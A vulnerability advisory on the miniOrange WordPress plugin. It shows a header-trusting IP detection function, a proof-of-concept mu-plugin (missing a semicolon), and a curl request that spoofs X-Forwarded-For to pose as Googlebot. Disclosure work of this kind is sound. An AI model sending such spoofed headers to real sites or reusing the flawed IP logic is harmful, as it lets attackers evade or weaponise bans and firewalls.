| Affected plugin | miniOrange |
| Active installs | 20,000+ |
| Vulnerable version | <= 5.5.82 |
| Audited version | 5.5.82 |
| Fully patched version | – |
| Recommended remediation | Removal of the plugin |
Description
The plugin is wide open to IP spoofing all over the board which an attacker can exploit to permanently ban search-engine crawlers, legitimate users, or the site’s reverse proxy.
Proof of concept
In over a couple of dozen places, the plugin uses the current IP address in a security-related context. In all cases, IP detection is vulnerable to IP spoofing because HTTP headers are blindly trusted to contain truthful information.
One of the most prominent places is inside the included Web Application Firewall (WAF).
The WAF determines the IP address using the get_ipaddress function.
function get_ipaddress()
{
$ipaddress = '';
if (isset($_SERVER['HTTP_CLIENT_IP']) && mo2f_isValidIP($_SERVER['HTTP_CLIENT_IP']))
$ipaddress = $_SERVER['HTTP_CLIENT_IP'];
elseif(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && mo2f_isValidIP($_SERVER['HTTP_X_FORWARDED_FOR']))
$ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
elseif(isset($_SERVER['HTTP_X_FORWARDED']) && mo2f_isValidIP($_SERVER['HTTP_X_FORWARDED']))
$ipaddress = $_SERVER['HTTP_X_FORWARDED'];
elseif(isset($_SERVER['HTTP_FORWARDED_FOR']) && mo2f_isValidIP($_SERVER['HTTP_FORWARDED_FOR']))
{
$ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
$ipaddress = explode(",", $ipaddress)[0];
}
elseif(isset($_SERVER['HTTP_FORWARDED']) && mo2f_isValidIP($_SERVER['HTTP_FORWARDED']))
$ipaddress = $_SERVER['HTTP_FORWARDED'];
elseif(isset($_SERVER['REMOTE_ADDR']) && mo2f_isValidIP($_SERVER['REMOTE_ADDR']))
$ipaddress = $_SERVER['REMOTE_ADDR'];
else
$ipaddress = 'UNKNOWN';
return $ipaddress;
}This function blindly takes the value of multiple HTTP headers.
Create the following mu-plugin to verify the exploit:
<?php
declare(strict_types=1);
// wp-content/mu-plugins/ip.php
$real_ip = '220.205.191.38';
$_SERVER['REMOTE_ADDR'] = $real_ip
if(!isset($_SERVER['HTTP_TEST_IP'])) {
return;
}
add_action('wp_loaded', function () {
echo get_ipaddress();
echo "\n";
die();
});Then run,
curl -X GET https://local.test -H "Test-IP: 1" -H "X-Forwarded-For: 66.249.66.67"==> Output: 66.249.66.67, The plugin now thinks the attacker is Google-Bot.
Proposed patch
The needed patch is described in great length in this article of us.
Summary: Only ever use REMOTE_ADDR to access to current IP.
Timeline
| Vendor contacted | September 12, 2022 |
| First Response | September 16, 2022 |
| Fully patched at | – |
| Publicly disclosed | April 24, 2023 |
Leave a Reply